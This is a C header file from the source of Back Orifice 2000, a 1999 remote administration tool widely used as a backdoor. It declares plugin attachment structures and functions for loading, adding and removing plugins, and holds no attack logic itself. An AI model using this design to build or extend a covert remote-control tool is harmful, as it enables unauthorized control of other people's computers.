/*  Back Orifice 2000 - Remote Administration Suite
    Copyright (C) 1999, Cult Of The Dead Cow

    This file is free software, and not subject to GNU Public License
	restrictions; you can redistribute it and/or modify it in any way 
	you see fit. This file is suitable for inclusion in a derivative
	work, regardless of license on the work or availability of source code
	to the work. If you redistribute this file, you must leave this
	header intact.
    
	This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  

	The author of this program may be contacted at dildog@l0pht.com. */

#ifndef __INC_PLUGINS_H
#define __INC_PLUGINS_H

#include<bocomreg.h>
#include<auth.h>
#include<encryption.h>
#include<iohandler.h>
#include<pviewer.h>

#define WM_CHILD_DESTROYED (WM_USER+1)

#pragma pack(push,1)

typedef struct {
	WORD nNumPlugins;
} ATTACHMENT_HEADER, *PATTACHMENT_HEADER;

typedef struct {
	DWORD dwPluginSize;
} ATTACHMENT_INDEX, *PATTACHMENT_INDEX;

#pragma pack(pop)

struct __plugin_version;
struct __plugin_linkage;

typedef BOOL (TYPEOF_InstallPlugin)(struct __plugin_linkage *ppl);
typedef BOOL (TYPEOF_PluginVersion)(struct __plugin_version *ppv);
typedef void (TYPEOF_TerminatePlugin)(void);

typedef int TYPEOF_AddPlugin(void *pPlugin, int nSize);
typedef int TYPEOF_DebugPlugin(char *svPluginFile);
typedef int TYPEOF_RemovePlugin(int nNum);
typedef HMODULE TYPEOF_GetPlugin(int nNum);

#ifdef __BO2KSERVER__

void LoadPlugins(void);
void UnloadPlugins(void);
int AddPlugin(void *pPlugin, int nSize);
int DebugPlugin(char *svPluginFile);
HMODULE GetPlugin(int nNum);
int RemovePlugin(int nNum);

#endif

#endif